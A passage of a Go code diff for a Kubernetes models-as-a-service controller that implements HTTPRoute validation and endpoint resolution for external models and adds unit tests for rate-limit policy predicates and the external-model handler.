+	const (
+		modelName     = "llm"
+		namespace     = "default"
+		httpRouteName = "maas-model-" + modelName
+		trlpName      = "maas-trlp-" + modelName
+		maasSubName   = "sub-a"
+	)
+
+	model := newMaaSModelRef(modelName, namespace, "ExternalModel", modelName)
+	route := newHTTPRoute(httpRouteName, namespace)
+	maasSub := newMaaSSubscription(maasSubName, namespace, "team-a", modelName, 100)
+
+	c := fake.NewClientBuilder().
+		WithScheme(scheme).
+		WithRESTMapper(testRESTMapper()).
+		WithObjects(model, route, maasSub).
+		WithStatusSubresource(&maasv1alpha1.MaaSSubscription{}).
+		Build()
+
+	r := &MaaSSubscriptionReconciler{Client: c, Scheme: scheme}
+	req := ctrl.Request{NamespacedName: types.NamespacedName{Name: maasSubName, Namespace: namespace}}
+	if _, err := r.Reconcile(context.Background(), req); err != nil {
+		t.Fatalf("Reconcile: unexpected error: %v", err)
+	}
+
+	trlp := &unstructured.Unstructured{}
+	trlp.SetGroupVersionKind(schema.GroupVersionKind{Group: "kuadrant.io", Version: "v1alpha1", Kind: "TokenRateLimitPolicy"})
+	if err := c.Get(context.Background(), types.NamespacedName{Name: trlpName, Namespace: namespace}, trlp); err != nil {
+		t.Fatalf("Get TokenRateLimitPolicy %q: %v", trlpName, err)
+	}
+
+	limitsMap, found, err := unstructured.NestedMap(trlp.Object, "spec", "limits")
+	if err != nil || !found {
+		t.Fatalf("spec.limits not found: found=%v err=%v", found, err)
+	}
+
+	// Should have exactly 1 limit entry (no deny rules)
+	if len(limitsMap) != 1 {
+		t.Errorf("expected 1 limit entry, got %d: %v", len(limitsMap), limitsMap)
+	}
+
+	// Check the limit entry key (now includes namespace: "namespace-name-model-tokens")
+	expectedKey := namespace + "-" + maasSubName + "-" + modelName + "-tokens"
+	limitEntry, ok := limitsMap[expectedKey]
+	if !ok {
+		t.Fatalf("expected limit entry %q not found, got keys: %v", expectedKey, getKeys(limitsMap))
+	}
+
+	// Verify it has a single, simple predicate
+	limitMap, ok := limitEntry.(map[string]interface{})
+	if !ok {
+		t.Fatalf("limitEntry is not map[string]interface{}: %T", limitEntry)
+	}
+	whenSlice, found, err := unstructured.NestedSlice(limitMap, "when")
+	if err != nil || !found {
+		t.Fatalf("when predicates not found: found=%v err=%v", found, err)
+	}
+
+	if len(whenSlice) != 1 {
+		t.Errorf("expected 1 when predicate, got %d", len(whenSlice))
+	}
+
+	predMap, ok := whenSlice[0].(map[string]interface{})
+	if !ok {
+		t.Fatalf("whenSlice[0] is not map[string]interface{}: %T", whenSlice[0])
+	}
+	pred, ok := predMap["predicate"].(string)
+	if !ok {
+		t.Fatalf("predicate not a string: %T", predMap["predicate"])
+	}
+
+	// Predicate now uses model-scoped key: namespace/name@modelNamespace/modelName
+	expected := fmt.Sprintf(`auth.identity.selected_subscription_key == "%s/%s@%s/%s"`, namespace, maasSubName, namespace, modelName)
+	if pred != expected {
+		t.Errorf("predicate = %q, want %q", pred, expected)
+	}
+
+	// Verify no membership/header checks in predicate
+	if strings.Contains(pred, "groups_str") || strings.Contains(pred, "request.headers") || strings.Contains(pred, "exists(") {
+		t.Errorf("predicate should not contain membership/header checks: %s", pred)
+	}
+
+	// Verify no deny rules
+	for key := range limitsMap {
+		if strings.Contains(key, "deny-") {
+			t.Errorf("found deny rule %q, expected none", key)
+		}
+	}
+}
+
+// TestMaaSSubscriptionReconciler_MultipleSubscriptionsSimplified verifies that
+// multiple subscriptions generate simple predicates without exclusion logic.
+func TestMaaSSubscriptionReconciler_MultipleSubscriptionsSimplified(t *testing.T) {
+	const (
+		modelName     = "llm"
+		namespace     = "default"
+		httpRouteName = "maas-model-" + modelName
+		trlpName      = "maas-trlp-" + modelName
+	)
+
+	model := newMaaSModelRef(modelName, namespace, "ExternalModel", modelName)
+	route := newHTTPRoute(httpRouteName, namespace)
+	subA := newMaaSSubscription("sub-a", namespace, "team-a", modelName, 100)
+	subB := newMaaSSubscription("sub-b", namespace, "team-b", modelName, 200)
+
+	c := fake.NewClientBuilder().
+		WithScheme(scheme).
+		WithRESTMapper(testRESTMapper()).
+		WithObjects(model, route, subA, subB).
+		WithStatusSubresource(&maasv1alpha1.MaaSSubscription{}).
+		Build()
+
+	r := &MaaSSubscriptionReconciler{Client: c, Scheme: scheme}
+
+	// Reconcile both subscriptions
+	reqA := ctrl.Request{NamespacedName: types.NamespacedName{Name: "sub-a", Namespace: namespace}}
+	if _, err := r.Reconcile(context.Background(), reqA); err != nil {
+		t.Fatalf("Reconcile sub-a: %v", err)
+	}
+
+	trlp := &unstructured.Unstructured{}
+	trlp.SetGroupVersionKind(schema.GroupVersionKind{Group: "kuadrant.io", Version: "v1alpha1", Kind: "TokenRateLimitPolicy"})
+	if err := c.Get(context.Background(), types.NamespacedName{Name: trlpName, Namespace: namespace}, trlp); err != nil {
+		t.Fatalf("Get TokenRateLimitPolicy: %v", err)
+	}
+
+	limitsMap, found, err := unstructured.NestedMap(trlp.Object, "spec", "limits")
+	if err != nil || !found {
+		t.Fatalf("spec.limits not found: found=%v err=%v", found, err)
+	}
+
+	// Should have exactly 2 limit entries (one per subscription, no deny rules)
+	if len(limitsMap) != 2 {
+		t.Errorf("expected 2 limit entries, got %d: %v", len(limitsMap), getKeys(limitsMap))
+	}
+
+	// Verify sub-a limit entry (now includes namespace in key)
+	subAKey := namespace + "-sub-a-" + modelName + "-tokens"
+	if limitA, ok := limitsMap[subAKey]; ok {
+		limitAMap, ok := limitA.(map[string]interface{})
+		if !ok {
+			t.Fatalf("sub-a limitEntry is not map[string]interface{}: %T", limitA)
+		}
+		whenSlice, found, err := unstructured.NestedSlice(limitAMap, "when")
+		if err != nil || !found {
+			t.Fatalf("sub-a when predicates not found: found=%v err=%v", found, err)
+		}
+		if len(whenSlice) != 1 {
+			t.Errorf("sub-a: expected 1 when predicate, got %d", len(whenSlice))
+		}
+		predMap, ok := whenSlice[0].(map[string]interface{})
+		if !ok {
+			t.Fatalf("sub-a whenSlice[0] is not map[string]interface{}: %T", whenSlice[0])
+		}
+		pred, ok := predMap["predicate"].(string)
+		if !ok {
+			t.Fatalf("sub-a predicate not a string: %T", predMap["predicate"])
+		}
+		// Predicate now uses model-scoped key: namespace/name@modelNamespace/modelName
+		expected := fmt.Sprintf(`auth.identity.selected_subscription_key == "%s/sub-a@%s/%s"`, namespace, namespace, modelName)
+		if pred != expected {
+			t.Errorf("sub-a predicate = %q, want %q", pred, expected)
+		}
+		// No exclusion logic (no reference to sub-b or team-b)
+		if strings.Contains(pred, "sub-b") || strings.Contains(pred, "team-b") {
+			t.Errorf("sub-a predicate should not reference sub-b: %s", pred)
+		}
+	} else {
+		t.Errorf("sub-a limit entry not found, got keys: %v", getKeys(limitsMap))
+	}
+
+	// Verify sub-b limit entry (now includes namespace in key)
+	subBKey := namespace + "-sub-b-" + modelName + "-tokens"
+	if limitB, ok := limitsMap[subBKey]; ok {
+		limitBMap, ok := limitB.(map[string]interface{})
+		if !ok {
+			t.Fatalf("sub-b limitEntry is not map[string]interface{}: %T", limitB)
+		}
+		whenSlice, found, err := unstructured.NestedSlice(limitBMap, "when")
+		if err != nil || !found {
+			t.Fatalf("sub-b when predicates not found: found=%v err=%v", found, err)
+		}
+		if len(whenSlice) != 1 {
+			t.Errorf("sub-b: expected 1 when predicate, got %d", len(whenSlice))
+		}
+		predMap, ok := whenSlice[0].(map[string]interface{})
+		if !ok {
+			t.Fatalf("sub-b whenSlice[0] is not map[string]interface{}: %T", whenSlice[0])
+		}
+		pred, ok := predMap["predicate"].(string)
+		if !ok {
+			t.Fatalf("sub-b predicate not a string: %T", predMap["predicate"])
+		}
+		// Predicate now uses model-scoped key: namespace/name@modelNamespace/modelName
+		expected := fmt.Sprintf(`auth.identity.selected_subscription_key == "%s/sub-b@%s/%s"`, namespace, namespace, modelName)
+		if pred != expected {
+			t.Errorf("sub-b predicate = %q, want %q", pred, expected)
+		}
+		// No exclusion logic (no reference to sub-a or team-a)
+		if strings.Contains(pred, "sub-a") || strings.Contains(pred, "team-a") {
+			t.Errorf("sub-b predicate should not reference sub-a: %s", pred)
+		}
+	} else {
+		t.Errorf("sub-b limit entry not found, got keys: %v", getKeys(limitsMap))
+	}
+
+	// Verify no deny rules
+	for key := range limitsMap {
+		if strings.Contains(key, "deny-") {
+			t.Errorf("found deny rule %q, expected none", key)
+		}
+	}
+}
+
+
+// Helper to get map keys
+func getKeys(m map[string]interface{}) []string {
+	keys := make([]string, 0, len(m))
+	for k := range m {
+		keys = append(keys, k)
+	}
+	return keys
+}
diff --git a/maas-controller/pkg/controller/maas/providers.go b/maas-controller/pkg/controller/maas/providers.go
index 333bfa6fa..9cb9dc2d8 100644
--- a/maas-controller/pkg/controller/maas/providers.go
+++ b/maas-controller/pkg/controller/maas/providers.go
@@ -32,6 +32,10 @@ import (
 // ErrKindNotImplemented indicates the model kind is recognized but not implemented (e.g. ExternalModel stub).
 var ErrKindNotImplemented = errors.New("model kind not implemented")
 
+// ErrHTTPRouteNotFound indicates the HTTPRoute for a model does not exist yet (normal during startup).
+// Controller should set status to Pending and requeue to retry.
+var ErrHTTPRouteNotFound = errors.New("HTTPRoute not found yet")
+
 // RouteResolver returns the HTTPRoute name and namespace for a MaaSModelRef.
 // Used by findHTTPRouteForModel and by AuthPolicy/Subscription controllers to attach policies.
 type RouteResolver interface {
@@ -132,7 +136,7 @@ func getHTTPRoute(ctx context.Context, c client.Reader, name, ns string) (*gatew
 	err := c.Get(ctx, types.NamespacedName{Name: name, Namespace: ns}, route)
 	if err != nil {
 		if apierrors.IsNotFound(err) {
-			return nil, fmt.Errorf("HTTPRoute %s/%s not found for model", ns, name)
+			return nil, fmt.Errorf("%w: HTTPRoute %s/%s", ErrHTTPRouteNotFound, ns, name)
 		}
 		return nil, fmt.Errorf("failed to get HTTPRoute %s/%s: %w", ns, name, err)
 	}
diff --git a/maas-controller/pkg/controller/maas/providers_external.go b/maas-controller/pkg/controller/maas/providers_external.go
index c890e48ae..5827a27be 100644
--- a/maas-controller/pkg/controller/maas/providers_external.go
+++ b/maas-controller/pkg/controller/maas/providers_external.go
@@ -22,66 +22,207 @@ import (
 
 	"github.com/go-logr/logr"
 	maasv1alpha1 "github.com/opendatahub-io/models-as-a-service/maas-controller/api/maas/v1alpha1"
+	apierrors "k8s.io/apimachinery/pkg/api/errors"
+	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
+	"k8s.io/apimachinery/pkg/types"
 	"sigs.k8s.io/controller-runtime/pkg/client"
+	gatewayapiv1 "sigs.k8s.io/gateway-api/apis/v1"
 )
 
+// routeConditionProgrammed is the "Programmed" condition type for route parent status.
+// gateway-api v1.2.1 only defines this as a Gateway condition (GatewayConditionProgrammed),
+// but gateway controllers commonly set it on route parent status as well.
+const routeConditionProgrammed = "Programmed"
+
 // externalModelHandler implements BackendHandler for kind "ExternalModel".
-// Until the logic below is implemented, ReconcileRoute and Status return ErrKindNotImplemented,
-// which causes the controller to set status Phase=Failed and Condition Reason=Unsupported.
 type externalModelHandler struct {
 	r *MaaSModelRefReconciler
 }
 
 // ReconcileRoute validates the user-supplied HTTPRoute for an external model and populates status.
-//
-// Current behaviour: returns ErrKindNotImplemented so the controller marks the model as Unsupported.
-//
-// To implement: Users supply the HTTPRoute (the controller does not create it). ReconcileRoute should:
-//  1. Resolve the HTTPRoute name/namespace from model spec (e.g. ModelReference or new ExternalModel-specific fields).
-//  2. Get the HTTPRoute and validate it references the configured gateway (r.gatewayName() / r.gatewayNamespace()).
-//  3. Populate model.Status with HTTPRouteName, HTTPRouteNamespace, HTTPRouteGatewayName,
-//     HTTPRouteGatewayNamespace, and HTTPRouteHostnames so Status() and discovery can derive the endpoint.
-//  4. Return nil on success; the controller will then call Status().
+// Users supply the HTTPRoute (the controller does not create it). The HTTPRoute naming convention
+// is "maas-model-<model.Name>" in the model's namespace.
 func (h *externalModelHandler) ReconcileRoute(ctx context.Context, log logr.Logger, model *maasv1alpha1.MaaSModelRef) error {
-	return fmt.Errorf("%w: ExternalModel", ErrKindNotImplemented)
+	// Fetch the referenced ExternalModel CR to get provider configuration
+	externalModel := &maasv1alpha1.ExternalModel{}
+	externalModelKey := types.NamespacedName{
+		Name:      model.Spec.ModelRef.Name,
+		Namespace: model.Namespace,
+	}
+	if err := h.r.Get(ctx, externalModelKey, externalModel); err != nil {
+		if apierrors.IsNotFound(err) {
+			return fmt.Errorf("ExternalModel %s not found in namespace %s", model.Spec.ModelRef.Name, model.Namespace)
+		}
+		return fmt.Errorf("failed to get ExternalModel %s: %w", model.Spec.ModelRef.Name, err)
+	}
+
+	routeName := fmt.Sprintf("maas-model-%s", model.Name)
+	routeNS := model.Namespace
+
+	route := &gatewayapiv1.HTTPRoute{}
+	key := client.ObjectKey{Name: routeName, Namespace: routeNS}
+	if err := h.r.Get(ctx, key, route); err != nil {
+		if apierrors.IsNotFound(err) {
+			log.Info("HTTPRoute not found for ExternalModel, waiting for user to create it",
+				"routeName", routeName, "namespace", routeNS, "model", model.Name)
+			// Clear stale route status so the model stays NotReady without requeue hot-looping
+			model.Status.Endpoint = ""
+			model.Status.HTTPRouteName = ""
+			model.Status.HTTPRouteNamespace = ""
+			model.Status.HTTPRouteGatewayName = ""
+			model.Status.HTTPRouteGatewayNamespace = ""
+			model.Status.HTTPRouteHostnames = nil
+			return nil
+		}
+		return fmt.Errorf("failed to get HTTPRoute %s/%s: %w", routeNS, routeName, err)
+	}
+
+	expectedGatewayName := h.r.gatewayName()
+	expectedGatewayNamespace := h.r.gatewayNamespace()
+	gatewayFound := false
+	gatewayAccepted := false
+	var gatewayName string
+	var gatewayNamespace string
+
+	for _, parentRef := range route.Spec.ParentRefs {
+		refName := string(parentRef.Name)
+		refNS := routeNS
+		if parentRef.Namespace != nil {
+			refNS = string(*parentRef.Namespace)
+		}
+		if refName == expectedGatewayName && refNS == expectedGatewayNamespace {
+			gatewayFound = true
+			gatewayName = refName
+			gatewayNamespace = refNS
+			break
+		}
+		if gatewayName == "" {
+			gatewayName = refName
+			gatewayNamespace = refNS
+		}
+	}
+
+	// Verify the gateway has accepted and programmed the route via status conditions
+	if gatewayFound {
+		for _, parent := range route.Status.RouteStatus.Parents {
+			pName := string(parent.ParentRef.Name)
+			pNS := routeNS
+			if parent.ParentRef.Namespace != nil {
+				pNS = string(*parent.ParentRef.Namespace)
+			}
+			if pName == expectedGatewayName && pNS == expectedGatewayNamespace {
+				accepted := false
+				programmed := false
+				for _, cond := range parent.Conditions {
+					if cond.Type == string(gatewayapiv1.RouteConditionAccepted) && cond.Status == metav1.ConditionTrue {
+						accepted = true
+					}
+					if cond.Type == routeConditionProgrammed && cond.Status == metav1.ConditionTrue {
+						programmed = true
+					}
+				}
+				gatewayAccepted = accepted && programmed
+				break
+			}
+		}
+	}
+
+	var hostnames []string
+	for _, hostname := range route.Spec.Hostnames {
+		hostnames = append(hostnames, string(hostname))
+	}
+
+	if !gatewayFound {
+		log.Error(nil, "HTTPRoute does not reference configured gateway",
+			"routeName", routeName, "routeNamespace", routeNS,
+			"expectedGateway", fmt.Sprintf("%s/%s", expectedGatewayNamespace, expectedGatewayName),
+			"foundGateway", fmt.Sprintf("%s/%s", gatewayNamespace, gatewayName))
+		return fmt.Errorf("HTTPRoute %s/%s does not reference gateway %s/%s (found: %s/%s)",
+			routeNS, routeName, expectedGatewayNamespace, expectedGatewayName, gatewayNamespace, gatewayName)
+	}
+
+	if !gatewayAccepted {
+		log.Info("HTTPRoute references correct gateway but not yet accepted and programmed",
+			"routeName", routeName, "namespace", routeNS, "model", model.Name)
+		model.Status.HTTPRouteName = routeName
+		model.Status.HTTPRouteNamespace = routeNS
+		// Don't set gateway/hostname fields until route is accepted
+		return nil
+	}
+
+	model.Status.HTTPRouteName = routeName
+	model.Status.HTTPRouteNamespace = routeNS
+	model.Status.HTTPRouteGatewayName = gatewayName
+	model.Status.HTTPRouteGatewayNamespace = gatewayNamespace
+	model.Status.HTTPRouteHostnames = hostnames
+
+	log.Info("HTTPRoute validated for ExternalModel",
+		"routeName", routeName, "namespace", routeNS, "model", model.Name,
+		"externalModel", externalModel.Name, "provider", externalModel.Spec.Provider,
+		"gateway", fmt.Sprintf("%s/%s", gatewayNamespace, gatewayName), "hostnames", hostnames)
+
+	return nil
 }
 
 // Status returns the model endpoint URL and whether the model is ready.
-//
-// Current behaviour: returns ErrKindNotImplemented so the controller marks the model as Unsupported.
-//
-// To implement:
-//  1. After ReconcileRoute has validated the user-supplied HTTPRoute and set status, read the route or gateway (e.g.
-//     r.Get(ctx, gatewayKey, gateway)) to get a hostname or address.
-//  2. Build the endpoint URL (e.g. "https://<hostname>/<model.Name>"). Prefer model.Status.HTTPRouteHostnames
-//     if ReconcileRoute set it from the HTTPRoute.
-//  3. Optionally probe the external endpoint (HTTP GET/HEAD) to determine ready. If you do not
-//     probe, you can return (endpoint, true, nil) once the HTTPRoute is in place.
-//  4. Return (endpoint, ready, nil). The controller will set model.Status.Endpoint and Phase
-//     (Ready or Pending) from this.
+// ExternalModel is considered ready once the HTTPRoute is validated (no backend readiness probe).
 func (h *externalModelHandler) Status(ctx context.Context, log logr.Logger, model *maasv1alpha1.MaaSModelRef) (endpoint string, ready bool, err error) {
-	return "", false, fmt.Errorf("%w: ExternalModel", ErrKindNotImplemented)
+	if model.Status.HTTPRouteName == "" || model.Status.HTTPRouteGatewayName == "" {
+		return "", false, nil
+	}
+
+	endpoint, err = h.GetModelEndpoint(ctx, log, model)
+	if err != nil {
+		return "", false, err
+	}
+
+	return endpoint, true, nil
 }
 
-// GetModelEndpoint returns the endpoint URL for ExternalModel. When implemented, use your own logic
-// (e.g. spec.endpoint or from your HTTPRoute); do not assume the same gateway hostname + path as llmisvc.
+// GetModelEndpoint returns the endpoint URL for the ExternalModel.
+// Follows the same resolution order as llmisvc: HTTPRoute hostnames > gateway listeners > gateway addresses.
 func (h *externalModelHandler) GetModelEndpoint(ctx context.Context, log logr.Logger, model *maasv1alpha1.MaaSModelRef) (string, error) {
-	return "", fmt.Errorf("%w: ExternalModel", ErrKindNotImplemented)
+	if len(model.Status.HTTPRouteHostnames) > 0 {
+		hostname := model.Status.HTTPRouteHostnames[0]
+		return fmt.Sprintf("https://%s/%s", hostname, model.Name), nil
+	}
+
+	gatewayName := h.r.gatewayName()
+	gatewayNS := h.r.gatewayNamespace()
+	gateway := &gatewayapiv1.Gateway{}
+	key := client.ObjectKey{Name: gatewayName, Namespace: gatewayNS}
+	if err := h.r.Get(ctx, key, gateway); err != nil {
+		return "", fmt.Errorf("failed to get gateway %s/%s: %w", gatewayNS, gatewayName, err)
+	}
+
+	for _, listener := range gateway.Spec.Listeners {
+		if listener.Hostname != nil {
+			return fmt.Sprintf("https://%s/%s", string(*listener.Hostname), model.Name), nil
+		}
+	}
+
+	for _, addr := range gateway.Status.Addresses {
+		if addr.Type != nil && *addr.Type == gatewayapiv1.HostnameAddressType {
+			return fmt.Sprintf("https://%s/%s", addr.Value, model.Name), nil
+		}
+	}
+	if len(gateway.Status.Addresses) > 0 {
+		log.Info("Using IP-based gateway address; TLS hostname verification may fail",
+			"address", gateway.Status.Addresses[0].Value, "model", model.Name)
+		return fmt.Sprintf("https://%s/%s", gateway.Status.Addresses[0].Value, model.Name), nil
+	}
+
+	return "", fmt.Errorf("unable to determine endpoint: gateway %s/%s has no hostname or addresses", gatewayNS, gatewayName)
 }
 
 // CleanupOnDelete is called when the MaaSModelRef is deleted.
-//
-// Current behaviour: no-op.
-//
-// ExternalModel: the HTTPRoute is user-supplied, so the controller does not delete it. No implementation needed.
+// ExternalModel: the HTTPRoute is user-supplied, so the controller does not delete it.
 func (h *externalModelHandler) CleanupOnDelete(ctx context.Context, log logr.Logger, model *maasv1alpha1.MaaSModelRef) error {
 	return nil
 }
 
 // externalModelRouteResolver returns the HTTPRoute name/namespace for ExternalModel.
 // Used by findHTTPRouteForModel and by AuthPolicy/Subscription controllers to attach policies.
-// Users supply the HTTPRoute; when implemented, resolve name/namespace from model spec (e.g. status or ModelReference fields).
-// This default assumes a convention of "maas-model-<model.Name>" in model.Namespace until the API supports an explicit route ref.
 type externalModelRouteResolver struct{}
 
 func (externalModelRouteResolver) HTTPRouteForModel(ctx context.Context, c client.Reader, model *maasv1alpha1.MaaSModelRef) (routeName, routeNamespace string, err error) {
diff --git a/maas-controller/pkg/controller/maas/providers_external_test.go b/maas-controller/pkg/controller/maas/providers_external_test.go
new file mode 100644
index 000000000..796738461
--- /dev/null
+++ b/maas-controller/pkg/controller/maas/providers_external_test.go
@@ -0,0 +1,313 @@
+/*
+Copyright 2025.
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+    http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
+*/
+
+package maas
+
+import (
+	"context"
+	"strings"
+	"testing"
+
+	maasv1alpha1 "github.com/opendatahub-io/models-as-a-service/maas-controller/api/maas/v1alpha1"
+	metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
+	"sigs.k8s.io/controller-runtime/pkg/log/zap"
+	gatewayapiv1 "sigs.k8s.io/gateway-api/apis/v1"
+)
+
+func newExternalModel(name, ns, provider, endpoint string) *maasv1alpha1.MaaSModelRef {
+	return &maasv1alpha1.MaaSModelRef{
+		ObjectMeta: metav1.ObjectMeta{Name: name, Namespace: ns},
+		Spec: maasv1alpha1.MaaSModelSpec{
+			ModelRef: maasv1alpha1.ModelReference{
+				Kind: "ExternalModel",
+				Name: name,
+			},
+		},
+	}
+}
+
+func newExternalModelCR(name, ns, provider, endpoint string) *maasv1alpha1.ExternalModel {
+	return &maasv1alpha1.ExternalModel{
+		ObjectMeta: metav1.ObjectMeta{Name: name, Namespace: ns},
+		Spec: maasv1alpha1.ExternalModelSpec{
+			Provider: provider,
+			Endpoint: endpoint,
+			CredentialRef: maasv1alpha1.CredentialReference{
+				Name: name + "-api-key",
+			},
+		},
+	}
+}
+
+func newHTTPRouteWithGateway(name, ns, gatewayName, gatewayNS string) *gatewayapiv1.HTTPRoute {
+	gwNS := gatewayapiv1.Namespace(gatewayNS)
+	return &gatewayapiv1.HTTPRoute{
+		ObjectMeta: metav1.ObjectMeta{Name: name, Namespace: ns},
+		Spec: gatewayapiv1.HTTPRouteSpec{
+			CommonRouteSpec: gatewayapiv1.CommonRouteSpec{
+				ParentRefs: []gatewayapiv1.ParentReference{
+					{Name: gatewayapiv1.ObjectName(gatewayName), Namespace: &gwNS},
+				},
+			},
+		},
+		Status: gatewayapiv1.HTTPRouteStatus{
+			RouteStatus: gatewayapiv1.RouteStatus{
+				Parents: []gatewayapiv1.RouteParentStatus{
+					{
+						ParentRef: gatewayapiv1.ParentReference{
+							Name:      gatewayapiv1.ObjectName(gatewayName),
+							Namespace: &gwNS,
+						},
+						Conditions: []metav1.Condition{
+							{Type: string(gatewayapiv1.RouteConditionAccepted), Status: metav1.ConditionTrue},
+							{Type: routeConditionProgrammed, Status: metav1.ConditionTrue},
+						},
+					},
+				},
+			},
+		},
+	}
+}
+
+func newGatewayWithHostname(name, ns, hostname string) *gatewayapiv1.Gateway {
+	h := gatewayapiv1.Hostname(hostname)
+	return &gatewayapiv1.Gateway{
+		ObjectMeta: metav1.ObjectMeta{Name: name, Namespace: ns},
+		Spec: gatewayapiv1.GatewaySpec{
+			Listeners: []gatewayapiv1.Listener{
+				{Name: "https", Hostname: &h},
+			},
+		},
+	}
+}
+
+func TestExternalModel_ReconcileRoute_Success(t *testing.T) {
+	model := newExternalModel("gpt-4o", "default", "openai", "api.openai.com")
+	externalModelCR := newExternalModelCR("gpt-4o", "default", "openai", "api.openai.com")
+	route := newHTTPRouteWithGateway("maas-model-gpt-4o", "default", "maas-default-gateway", "openshift-ingress")
+
+	r, _ := newTestReconciler(model, externalModelCR, route)
+	r.GatewayName = "maas-default-gateway"
+	r.GatewayNamespace = "openshift-ingress"
+	handler := &externalModelHandler{r: r}
+	log := zap.New(zap.UseDevMode(true))
+
+	err := handler.ReconcileRoute(context.Background(), log, model)
+	if err != nil {
+		t.Fatalf("ReconcileRoute: unexpected error: %v", err)
+	}
+
+	if model.Status.HTTPRouteName != "maas-model-gpt-4o" {
+		t.Errorf("HTTPRouteName = %q, want %q", model.Status.HTTPRouteName, "maas-model-gpt-4o")
+	}
+	if model.Status.HTTPRouteGatewayName != "maas-default-gateway" {
+		t.Errorf("HTTPRouteGatewayName = %q, want %q", model.Status.HTTPRouteGatewayName, "maas-default-gateway")
+	}
+}
+
+func TestExternalModel_ReconcileRoute_MissingHTTPRoute(t *testing.T) {
+	model := newExternalModel("gpt-4o", "default", "openai", "api.openai.com")
+	externalModelCR := newExternalModelCR("gpt-4o", "default", "openai", "api.openai.com")
+	// Pre-populate status to verify it gets cleared
+	model.Status.HTTPRouteName = "stale-route"
+	model.Status.Endpoint = "https://stale.example.com/gpt-4o"
+
+	r, _ := newTestReconciler(model, externalModelCR)
+	r.GatewayName = "maas-default-gateway"
+	r.GatewayNamespace = "openshift-ingress"
+	handler := &externalModelHandler{r: r}
+	log := zap.New(zap.UseDevMode(true))
+
+	err := handler.ReconcileRoute(context.Background(), log, model)
+	if err != nil {
+		t.Fatalf("ReconcileRoute: expected nil error for missing HTTPRoute (Pending), got: %v", err)
+	}
+	if model.Status.HTTPRouteName != "" {
+		t.Errorf("HTTPRouteName should be cleared, got %q", model.Status.HTTPRouteName)
+	}
+	if model.Status.Endpoint != "" {
+		t.Errorf("Endpoint should be cleared, got %q", model.Status.Endpoint)
+	}
+}
+
+func TestExternalModel_ReconcileRoute_MissingExternalModel(t *testing.T) {
+	model := newExternalModel("gpt-4o", "default", "openai", "api.openai.com")
+	// Don't create ExternalModel CR - it should fail
+
+	r, _ := newTestReconciler(model)
+	handler := &externalModelHandler{r: r}
+	log := zap.New(zap.UseDevMode(true))
+
+	err := handler.ReconcileRoute(context.Background(), log, model)
+	if err == nil {
+		t.Fatal("ReconcileRoute: expected error for missing ExternalModel CR")
+	}
+	if !strings.Contains(err.Error(), "ExternalModel") || !strings.Contains(err.Error(), "not found") {
+		t.Errorf("ReconcileRoute: error = %q, want to contain 'ExternalModel' and 'not found'", err.Error())
+	}
+}
+
+func TestExternalModel_ReconcileRoute_WrongGateway(t *testing.T) {
+	model := newExternalModel("gpt-4o", "default", "openai", "api.openai.com")
+	externalModelCR := newExternalModelCR("gpt-4o", "default", "openai", "api.openai.com")
+	route := newHTTPRouteWithGateway("maas-model-gpt-4o", "default", "wrong-gateway", "wrong-ns")
+
+	r, _ := newTestReconciler(model, externalModelCR, route)
+	r.GatewayName = "maas-default-gateway"
+	r.GatewayNamespace = "openshift-ingress"
+	handler := &externalModelHandler{r: r}
+	log := zap.New(zap.UseDevMode(true))
+
+	err := handler.ReconcileRoute(context.Background(), log, model)
+	if err == nil {
+		t.Fatal("ReconcileRoute: expected error for wrong gateway")
+	}
+	if !strings.Contains(err.Error(), "does not reference gateway") {
+		t.Errorf("ReconcileRoute: error = %q, want to contain 'does not reference gateway'", err.Error())
+	}
+}
+
+func TestExternalModel_Status_Ready(t *testing.T) {
+	model := newExternalModel("gpt-4o", "default", "openai", "api.openai.com")
+	model.Status.HTTPRouteName = "maas-model-gpt-4o"
+	model.Status.HTTPRouteGatewayName = "maas-default-gateway"
+	model.Status.HTTPRouteHostnames = []string{"maas.example.com"}
+
+	r, _ := newTestReconciler(model)
+	handler := &externalModelHandler{r: r}
+	log := zap.New(zap.UseDevMode(true))
+
+	endpoint, ready, err := handler.Status(context.Background(), log, model)
+	if err != nil {
+		t.Fatalf("Status: unexpected error: %v", err)
+	}
+	if !ready {
+		t.Error("Status: ready = false, want true")
+	}
+	if endpoint != "https://maas.example.com/gpt-4o" {
+		t.Errorf("Status: endpoint = %q, want %q", endpoint, "https://maas.example.com/gpt-4o")
+	}
+}
+
+func TestExternalModel_Status_NotReadyWhenGatewayNotAccepted(t *testing.T) {
+	model := newExternalModel("gpt-4o", "default", "openai", "api.openai.com")
+	// HTTPRouteName set but gateway not yet accepted (no HTTPRouteGatewayName)
+	model.Status.HTTPRouteName = "maas-model-gpt-4o"
+
+	r, _ := newTestReconciler(model)
+	handler := &externalModelHandler{r: r}
+	log := zap.New(zap.UseDevMode(true))
+
+	_, ready, err := handler.Status(context.Background(), log, model)
+	if err != nil {
+		t.Fatalf("Status: unexpected error: %v", err)
+	}
+	if ready {
+		t.Error("Status: ready = true, want false (gateway not yet accepted)")
+	}
+}
+
+func TestExternalModel_Status_NotReady(t *testing.T) {
+	model := newExternalModel("gpt-4o", "default", "openai", "api.openai.com")
+
+	r, _ := newTestReconciler(model)
+	handler := &externalModelHandler{r: r}
+	log := zap.New(zap.UseDevMode(true))
+
+	_, ready, err := handler.Status(context.Background(), log, model)
+	if err != nil {
+		t.Fatalf("Status: unexpected error: %v", err)
+	}
+	if ready {
+		t.Error("Status: ready = true, want false")
+	}
+}
+
+func TestExternalModel_GetModelEndpoint_FromHostnames(t *testing.T) {
+	model := newExternalModel("claude-sonnet", "default", "anthropic", "api.anthropic.com")
+	model.Status.HTTPRouteHostnames = []string{"maas.example.com"}
+
+	r, _ := newTestReconciler(model)
+	handler := &externalModelHandler{r: r}
+	log := zap.New(zap.UseDevMode(true))
+
+	endpoint, err := handler.GetModelEndpoint(context.Background(), log, model)
+	if err != nil {
+		t.Fatalf("GetModelEndpoint: unexpected error: %v", err)
+	}
+	if endpoint != "https://maas.example.com/claude-sonnet" {
+		t.Errorf("GetModelEndpoint = %q, want %q", endpoint, "https://maas.example.com/claude-sonnet")
+	}
